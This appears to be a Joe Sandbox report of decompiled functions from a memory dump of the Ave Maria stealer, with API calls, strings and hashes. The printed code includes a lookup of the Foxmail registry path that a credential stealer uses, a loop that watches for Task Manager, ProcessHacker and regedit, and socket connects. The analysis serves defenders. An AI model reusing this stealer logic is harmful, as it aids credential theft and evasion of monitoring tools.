Part of subcall function 0103906F: GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,?,01032F48,?,00000001,?,?), ref: 010390AE
Part of subcall function 0103906F: LeaveCriticalSection.KERNEL32(0118A808,?,00000000), ref: 01039101

Strings

\Microsoft Vision\, xrefs: 01032F20

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: CriticalFileSection$CreateInitializeProcess$ChangeCloseCurrentFindModuleNameNotificationOpenTokenlstrlen$AddressComputerDeleteDirectoryDispatcherEnterExceptionFolderGlobalHandleInformationInstanceLeaveLibraryLoadMemoryPathProcReadSecuritySizeStatusUserlstrcat
String ID: \Microsoft Vision\
API String ID: 2654234449-1618823865
Opcode ID: b30cb0eb65a3b6044e1d4ce32adb6e7719a322e100f374cf2a9ab79bf89cfb51
Instruction ID: 3d0a22b1d1c3a43cddb494377cf450326d9db051ceb96ff02b2c66b08a3aab17
Opcode Fuzzy Hash: b30cb0eb65a3b6044e1d4ce32adb6e7719a322e100f374cf2a9ab79bf89cfb51
Instruction Fuzzy Hash: 1A31A5F1A0021ABFDF14FBA0DDC5DEEB77DEF98300F000468B185A6190DA756A44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01042049 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 61
windowCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E01042049(void* __ecx, void* __eflags) {
				void* _v8;
				char _v12;
				char _v16;
				intOrPtr _v40;
				char _v44;
				void* _t15;
				intOrPtr* _t16;
				intOrPtr _t34;
				void* _t45;

				_t45 = __eflags;
				_t15 = E01041E6D();
				_push(__ecx);
				_t16 = E01041E88(_t15, "VirtualQuery", _t45);
				if(_t16 != 0) {
					_t16 =  *_t16(E01042049,  &_v44, 0x1c);
					_t34 = _v40;
					_t47 = _t34;
					if(_t34 != 0) {
						E01041CE3(_t34, _t47);
						MessageBoxA(0, "Bla2", "Bla2", 0);
						_push(_t34);
						_v12 = 0;
						E010420F8( &_v16, _t47, E010336F7( &_v8, L"Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper"),  &_v12);
						E01035FEB(_v8);
						_v8 = 0;
						E01035FEB(0);
						_push(0);
						_v12 = 0;
						E010420F8( &_v16, _t47, E010336F7( &_v8, L"C:\\Users\\Vitali Kremez\\Documents\\MidgetPorn\\workspace\\MsgBox.exe"),  &_v12);
						E01035FEB(_v8);
						_v8 = 0;
						return E01035FEB(0);
					}
				}
				return _t16;
			}

0x01042049
0x01042050
0x01042055
0x0104205d
0x01042065
0x01042076
0x01042078
0x0104207b
0x0104207d
0x0104207f
0x0104208f
0x01042095
0x01042099
0x010420ae
0x010420b6
0x010420bd
0x010420c0
0x010420c5
0x010420c9
0x010420de
0x010420e6
0x010420ed
0x00000000
0x010420f0
0x0104207d
0x010420f7

APIs

Part of subcall function 01041E88: lstrcmpA.KERNEL32(?,01043251,?,open,01043251), ref: 01041EC1

MessageBoxA.USER32 ref: 0104208F

Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,00000000,?,01043483,00000000,00000000,.bss,00000000), ref: 01033700
Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,?,01043483,00000000,00000000,.bss,00000000), ref: 01033717
Part of subcall function 010336F7: KiUserExceptionDispatcher.NTDLL ref: 01033732

Part of subcall function 010420F8: CreateProcessW.KERNEL32 ref: 01042133

Part of subcall function 01035FEB: VirtualFree.KERNELBASE(?,00000000,00008000,01035D70,00000000,?,01042694,?,?,0104577A), ref: 01035FF3

Strings

VirtualQuery, xrefs: 01042056
Bla2, xrefs: 01042086, 0104208C, 0104208D
C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe, xrefs: 010420CD
Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper, xrefs: 0104209D

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: lstrlen$CreateDispatcherExceptionFreeMessageProcessUserVirtuallstrcmp
String ID: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper$Bla2$C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe$VirtualQuery
API String ID: 2449179951-2308542105
Opcode ID: 4705ba916949dff3bd105b3a3d190ea196f1271ae2113dc1b232b4b9442c53e0
Instruction ID: 9976478e6c689fd9649777bc16ce1105d4a7214d04e81d398dda3a7c73250a36
Opcode Fuzzy Hash: 4705ba916949dff3bd105b3a3d190ea196f1271ae2113dc1b232b4b9442c53e0
Instruction Fuzzy Hash: 0E1170B1A4010ABB8B28FBA5DD96CEF7BBCAF68640B10017DB482A6150DF705B45D6A4

Uniqueness

Uniqueness Score: -1.00%

Function 0103C5E8 Relevance: 8.8, APIs: 7, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0103C5E8(void* __ecx) {
				void* _t13;
				void* _t25;

				_t25 = __ecx;
				if(__ecx != 0) {
					if( *(__ecx + 0x30) != 0) {
						LocalFree( *(__ecx + 0x30));
					}
					if( *(_t25 + 0x40) != 0) {
						LocalFree( *(_t25 + 0x40));
					}
					if( *(_t25 + 0x48) != 0) {
						LocalFree( *(_t25 + 0x48));
					}
					if( *(_t25 + 0x58) != 0) {
						LocalFree( *(_t25 + 0x58));
					}
					if( *(_t25 + 0x60) != 0) {
						LocalFree( *(_t25 + 0x60));
					}
					if( *(_t25 + 0x68) != 0) {
						LocalFree( *(_t25 + 0x68));
					}
					return LocalFree(_t25);
				}
				return _t13;
			}

0x0103c5e9
0x0103c5ed
0x0103c5fa
0x0103c5ff
0x0103c5ff
0x0103c605
0x0103c60a
0x0103c60a
0x0103c610
0x0103c615
0x0103c615
0x0103c61b
0x0103c620
0x0103c620
0x0103c626
0x0103c62b
0x0103c62b
0x0103c631
0x0103c636
0x0103c636
0x00000000
0x0103c63b
0x0103c63d

APIs

LocalFree.KERNEL32(?,00000000,00000000,0103C25A), ref: 0103C5FF
LocalFree.KERNEL32(?,00000000,00000000,0103C25A), ref: 0103C60A
LocalFree.KERNEL32(?,00000000,00000000,0103C25A), ref: 0103C615
LocalFree.KERNEL32(?,00000000,00000000,0103C25A), ref: 0103C620
LocalFree.KERNEL32(?,00000000,00000000,0103C25A), ref: 0103C62B
LocalFree.KERNEL32(?,00000000,00000000,0103C25A), ref: 0103C636
LocalFree.KERNEL32(00000000,00000000,00000000,0103C25A), ref: 0103C639

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: FreeLocal
String ID:
API String ID: 2826327444-0
Opcode ID: 3d153b54c334915babf5181125b0fb1d4f3e9879768b810df457e76db133e531
Instruction ID: 26992276551c763200134bd01d8d41dc59c3d3670dcf3e8bf9629a98183d5343
Opcode Fuzzy Hash: 3d153b54c334915babf5181125b0fb1d4f3e9879768b810df457e76db133e531
Instruction Fuzzy Hash: 6FF0EC31011B549BF7726A2ACD04766BAE9BFC4305F05187AD2C2A1970C776B895EF44

Uniqueness

Uniqueness Score: -1.00%

Function 010394FF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010394FF(void* __ecx) {
				int _v8;
				void* _v12;
				void* _t7;

				if(RegOpenKeyExA(0x80000001, "software\\Aerofox\\FoxmailPreview", 0, 0x20019,  &_v12) != 0) {
					L3:
					_t7 = 0;
				} else {
					_v8 = 0x104;
					if(RegQueryValueExA(_v12, "Executable", 0, 0, 0x1056868,  &_v8) != 0) {
						goto L3;
					} else {
						PathRemoveFileSpecA(0x1056868);
						_t7 = 1;
					}
				}
				return _t7;
			}

0x01039522
0x01039556
0x01039556
0x01039524
0x01039527
0x01039549
0x00000000
0x0103954b
0x0103954c
0x01039552
0x01039552
0x01039549
0x0103955a

APIs

RegOpenKeyExA.ADVAPI32(80000001,software\Aerofox\FoxmailPreview,00000000,00020019,?), ref: 0103951A
RegQueryValueExA.ADVAPI32(?,Executable,00000000,00000000,01056868,?), ref: 01039541
PathRemoveFileSpecA.SHLWAPI(01056868), ref: 0103954C

Strings

Executable, xrefs: 01039539
software\Aerofox\FoxmailPreview, xrefs: 01039510

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: FileOpenPathQueryRemoveSpecValue
String ID: Executable$software\Aerofox\FoxmailPreview
API String ID: 3687894118-2371247776
Opcode ID: 3084018bc2d75b15ff1f9210928800cf6d7c9fc341f09f34c6d64b145f106926
Instruction ID: fbc92cc54a886a0373848e850e79bee44e865391adf1c8c044518b3d161ea609
Opcode Fuzzy Hash: 3084018bc2d75b15ff1f9210928800cf6d7c9fc341f09f34c6d64b145f106926
Instruction Fuzzy Hash: FFF0A7F8641208BBEB604A85DD86FDA37EC9755B08F100058BB45B1082D3F595449720

Uniqueness

Uniqueness Score: -1.00%

Function 0103F086 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 90
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0103F086() {
				signed int _v8;
				char _v12;
				signed int _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t26;
				void* _t29;
				signed int _t32;
				signed int _t35;
				void* _t42;
				void* _t56;
				void* _t58;
				void* _t59;
				signed int _t60;
				signed int _t61;
				signed int _t62;
				void* _t64;

				_t64 = (_t62 & 0xfffffff8) - 0x1c;
				_t42 = 0;
				_v16 = _v16 & 0;
				_t56 = 0;
				_v8 = _v8 & 0;
				L1:
				_t26 = E01042155(E010336F7( &_v28, L"explorer.exe"));
				_t45 = _v32;
				_t58 = _t26;
				E01035FEB(_v32);
				_v32 = _v32 & 0x00000000;
				if(_t58 != 0 && _t58 != _t56) {
					_t56 = _t58;
					E01037B2E(_t45, _t45, _t58);
					_t64 = _t64 + 0xc;
				}
				_t29 = E01042155(E010336F7( &_v24, L"TASKmgr.exe"));
				_t48 = _v28;
				_t59 = _t29;
				E01035FEB(_v28);
				_v28 = _v28 & 0x00000000;
				if(_t59 != 0 && _t59 != _t42) {
					_t42 = _t59;
					E01037B2E(_t48, _t48, _t59);
					_t64 = _t64 + 0xc;
				}
				_t32 = E01042155(E010336F7( &_v20, L"ProcessHacker.exe"));
				_t51 = _v24;
				_t60 = _t32;
				E01035FEB(_v24);
				_v24 = _v24 & 0x00000000;
				if(_t60 != 0 && _t60 != _v16) {
					_v16 = _t60;
					E01037B2E(_t51, _t51, _t60);
					_t64 = _t64 + 0xc;
				}
				_t35 = E01042155(E010336F7( &_v12, L"regedit.exe"));
				_t54 = _v16;
				_t61 = _t35;
				E01035FEB(_v16);
				_v16 = _v16 & 0x00000000;
				if(_t61 != 0 && _t61 != _v8) {
					_v8 = _t61;
					E01037B2E(_t54, _t54, _t61);
					_t64 = _t64 + 0xc;
				}
				Sleep(0x3e8);
				goto L1;
			}

0x0103f08c
0x0103f091
0x0103f093
0x0103f098
0x0103f09a
0x0103f09e
0x0103f0ae
0x0103f0b3
0x0103f0b7
0x0103f0b9
0x0103f0be
0x0103f0c5
0x0103f0ce
0x0103f0d0
0x0103f0d5
0x0103f0d5
0x0103f0e8
0x0103f0ed
0x0103f0f1
0x0103f0f3
0x0103f0f8
0x0103f0ff
0x0103f108
0x0103f10a
0x0103f10f
0x0103f10f
0x0103f122
0x0103f127
0x0103f12b
0x0103f12d
0x0103f132
0x0103f139
0x0103f144
0x0103f148
0x0103f14d
0x0103f14d
0x0103f160
0x0103f165
0x0103f169
0x0103f16b
0x0103f170
0x0103f177
0x0103f182
0x0103f186
0x0103f18b
0x0103f18b
0x0103f193
0x00000000

APIs

Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,00000000,?,01043483,00000000,00000000,.bss,00000000), ref: 01033700
Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,?,01043483,00000000,00000000,.bss,00000000), ref: 01033717
Part of subcall function 010336F7: KiUserExceptionDispatcher.NTDLL ref: 01033732

Part of subcall function 01042155: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 01042170
Part of subcall function 01042155: Process32FirstW.KERNEL32(00000000,0000022C), ref: 01042185
Part of subcall function 01042155: CloseHandle.KERNEL32(00000000,?,00000000), ref: 010421C1

Part of subcall function 01035FEB: VirtualFree.KERNELBASE(?,00000000,00008000,01035D70,00000000,?,01042694,?,?,0104577A), ref: 01035FF3

Sleep.KERNEL32(000003E8), ref: 0103F193

Strings

explorer.exe, xrefs: 0103F09E
ProcessHacker.exe, xrefs: 0103F112
TASKmgr.exe, xrefs: 0103F0D8
regedit.exe, xrefs: 0103F150

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: lstrlen$CloseCreateDispatcherExceptionFirstFreeHandleProcess32SleepSnapshotToolhelp32UserVirtual
String ID: ProcessHacker.exe$TASKmgr.exe$explorer.exe$regedit.exe
API String ID: 1262619635-2180853415
Opcode ID: c0fd5879b1a392bac348bed315a1a6145c0fe38814e9e31f97463c140d3e9119
Instruction ID: 16e9fdcad49aaf27e271112d6af2f328793f94af7e693cf2de90d6a9d2fd8b5f
Opcode Fuzzy Hash: c0fd5879b1a392bac348bed315a1a6145c0fe38814e9e31f97463c140d3e9119
Instruction Fuzzy Hash: 7F210BB1D053126BD724FF64D885AAFB6DCAFE8654F040A6CF9C527250EB249D04C6D3

Uniqueness

Uniqueness Score: -1.00%

Function 010403B9 Relevance: 7.6, APIs: 5, Instructions: 70networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000001,00000006), ref: 010403D3
gethostbyname.WS2_32(?), ref: 010403DC
htons.WS2_32(?), ref: 01040400
InetNtopW.WS2_32(00000002,?,?,00000802), ref: 01040431
connect.WS2_32(00000000,?,00000010), ref: 0104044A

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: InetNtopconnectgethostbynamehtonssocket
String ID:
API String ID: 2393792429-0
Opcode ID: 66ea1dace2369a4d0e757de0c3bd2f36dbb5ee826405365f1bbfc8382b7718ec
Instruction ID: 19a5d45ff570a6789dd6bc64128d19eabb45d2a642a2011fc898272109f21179
Opcode Fuzzy Hash: 66ea1dace2369a4d0e757de0c3bd2f36dbb5ee826405365f1bbfc8382b7718ec
Instruction Fuzzy Hash: 3911E9F69002587BE72097A4AC4AFFB7BECEF45721F0084A5F985D7181E6B5890487A0

Uniqueness

Uniqueness Score: -1.00%

Function 0103906F Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0103906F(intOrPtr _a4, intOrPtr _a8) {
				void _v28;
				void* _t13;
				signed int _t14;

				InitializeCriticalSection( &_v28);
				_t14 = 6;
				DeleteCriticalSection(memcpy(0x118a808,  &_v28, _t14 << 2));
				EnterCriticalSection(0x118a808);
				 *0x118a830 = _a4;
				GetModuleHandleA(0);
				 *0x105675c = 0x1189de0;
				if(_a8 == 0) {
					E01031F98(0x118a854);
					 *0x1189de0 = 1;
					_t13 = E01031F6D(0x118a84c, E01038D0F, 0x1189de0);
				} else {
					_t13 = E01031F6D(0x118a854, E01037F94, 0x1189de0);
					 *0x118a7f4 = 1;
				}
				LeaveCriticalSection(0x118a808);
				return _t13;
			}

0x0103907b
0x01039083
0x01039092
0x0103909e
0x010390a9
0x010390ae
0x010390bd
0x010390c8
0x010390e1
0x010390f1
0x010390fb
0x010390ca
0x010390d0
0x010390d5
0x010390d5
0x01039101
0x0103910a

APIs

InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,01032F48,?,00000001,?,?), ref: 0103907B
DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,01032F48,?,00000001,?,?), ref: 01039092
EnterCriticalSection.KERNEL32(0118A808,?,00000000,?,?,?,?,01032F48,?,00000001,?,?), ref: 0103909E
GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,?,01032F48,?,00000001,?,?), ref: 010390AE
LeaveCriticalSection.KERNEL32(0118A808,?,00000000), ref: 01039101

Part of subcall function 01031F6D: CreateThread.KERNEL32 ref: 01031F82

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: CriticalSection$CreateDeleteEnterHandleInitializeLeaveModuleThread
String ID:
API String ID: 2964645253-0
Opcode ID: a2285dd3f286f919dc5e02c592b37550b195320be75d8d51910e34fe8d879e72
Instruction ID: 1530eea24749c3087e47edec7a87ebb717545ee8f9821f09b81fbdae8ffdd0e2
Opcode Fuzzy Hash: a2285dd3f286f919dc5e02c592b37550b195320be75d8d51910e34fe8d879e72
Instruction Fuzzy Hash: B70175B59002049FCB24BF55E94DB9F3B6DFF95715F00801AF68567144C77A4485CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0104221F Relevance: 7.5, APIs: 5, Instructions: 44
processCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0104221F(signed int* __ecx, void* __edx) {
				char _v524;
				intOrPtr _v552;
				void* _v560;
				int _t9;
				void* _t15;
				void* _t19;
				signed int* _t20;

				_t15 = __edx;
				_v560 = 0x22c;
				_t20 = __ecx;
				_t19 = CreateToolhelp32Snapshot(2, 0);
				if(_t19 == 0xffffffff) {
					L6:
					 *_t20 =  *_t20 & 0x00000000;
				} else {
					_push( &_v560);
					_t9 = Process32FirstW(_t19);
					while(_t9 != 0) {
						if(_v552 == _t15) {
							CloseHandle(_t19);
							E010336F7(_t20,  &_v524);
						} else {
							_t9 = Process32NextW(_t19,  &_v560);
							continue;
						}
						goto L7;
					}
					CloseHandle(_t19);
					goto L6;
				}
				L7:
				return _t20;
			}

0x0104222f
0x01042231
0x0104223b
0x01042243
0x01042248
0x0104227b
0x0104227b
0x0104224a
0x01042250
0x01042252
0x01042270
0x01042260
0x01042286
0x01042295
0x01042262
0x0104226a
0x00000000
0x0104226a
0x00000000
0x01042260
0x01042275
0x00000000
0x01042275
0x0104227f
0x01042284

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0104223D
Process32FirstW.KERNEL32(00000000,0000022C), ref: 01042252
Process32NextW.KERNEL32(00000000,0000022C), ref: 0104226A
CloseHandle.KERNEL32(00000000,?,00000000), ref: 01042275
CloseHandle.KERNEL32(00000000,?,00000000), ref: 01042286

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
String ID:
API String ID: 1789362936-0
Opcode ID: b8b8511043aceb7ca746f8e88c5d4e4508809218f232a3bd620b7465bfc3883a
Instruction ID: bd18562bd236eb665e4380fb17fd299478bb55c10a9568117b3c989adef2e0c7
Opcode Fuzzy Hash: b8b8511043aceb7ca746f8e88c5d4e4508809218f232a3bd620b7465bfc3883a
Instruction Fuzzy Hash: 2A01F9B13011147BDB306BB8BECCBBE7BBCEB88761F1041A5F695D2180D77488458B60

Uniqueness

Uniqueness Score: -1.00%

Function 0103B10E Relevance: 7.5, APIs: 5, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0103B10E(void* __ecx) {
				int _t15;
				void* _t18;

				_t18 = __ecx;
				FreeLibrary( *(__ecx + 0xb4));
				 *((intOrPtr*)(_t18 + 0xb4)) = 0;
				FreeLibrary( *(_t18 + 0xa8));
				 *(_t18 + 0xa8) = 0;
				FreeLibrary( *(_t18 + 0xac));
				 *(_t18 + 0xac) = 0;
				FreeLibrary( *(_t18 + 0xb8));
				 *(_t18 + 0xb8) = 0;
				_t15 = FreeLibrary( *(_t18 + 0xb0));
				 *(_t18 + 0xb0) = 0;
				return _t15;
			}

0x0103b117
0x0103b11f
0x0103b129
0x0103b12f
0x0103b137
0x0103b13d
0x0103b145
0x0103b14b
0x0103b153
0x0103b159
0x0103b15b
0x0103b164

APIs

FreeLibrary.KERNEL32(?,00000001,?,00000000,0103A897), ref: 0103B11F
FreeLibrary.KERNEL32(?,?,00000000,0103A897), ref: 0103B12F
FreeLibrary.KERNEL32(?,?,00000000,0103A897), ref: 0103B13D
FreeLibrary.KERNEL32(?,?,00000000,0103A897), ref: 0103B14B
FreeLibrary.KERNEL32(?,?,00000000,0103A897), ref: 0103B159

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: d16257a32eaa1f6f2ee60aa1ac7952380bf939c7a6bfefcf97cf2a0149233ecc
Instruction ID: cbcf44020aa33a4839b1aea07d6b059878934dae364cd49027ceaa416d0c1c07
Opcode Fuzzy Hash: d16257a32eaa1f6f2ee60aa1ac7952380bf939c7a6bfefcf97cf2a0149233ecc
Instruction Fuzzy Hash: 7BF01EB1B00B26BEC7485F368C80B86FE2AFF09260F00422BA12C42221CB712434DFD2

Uniqueness

Uniqueness Score: -1.00%

Function 0103AD8C Relevance: 7.5, APIs: 5, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0103AD8C(void* __ecx) {
				int _t15;
				void* _t18;

				_t18 = __ecx;
				FreeLibrary( *(__ecx + 0xb4));
				 *((intOrPtr*)(_t18 + 0xb4)) = 0;
				FreeLibrary( *(_t18 + 0xa8));
				 *(_t18 + 0xa8) = 0;
				FreeLibrary( *(_t18 + 0xac));
				 *(_t18 + 0xac) = 0;
				FreeLibrary( *(_t18 + 0xb8));
				 *(_t18 + 0xb8) = 0;
				_t15 = FreeLibrary( *(_t18 + 0xb0));
				 *(_t18 + 0xb0) = 0;
				return _t15;
			}

0x0103ad95
0x0103ad9d
0x0103ada7
0x0103adad
0x0103adb5
0x0103adbb
0x0103adc3
0x0103adc9
0x0103add1
0x0103add7
0x0103add9
0x0103ade2

APIs

FreeLibrary.KERNEL32(?,?,?,00000000,0103A344), ref: 0103AD9D
FreeLibrary.KERNEL32(?,?,?,00000000,0103A344), ref: 0103ADAD
FreeLibrary.KERNEL32(?,?,?,00000000,0103A344), ref: 0103ADBB
FreeLibrary.KERNEL32(?,?,?,00000000,0103A344), ref: 0103ADC9
FreeLibrary.KERNEL32(?,?,?,00000000,0103A344), ref: 0103ADD7

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

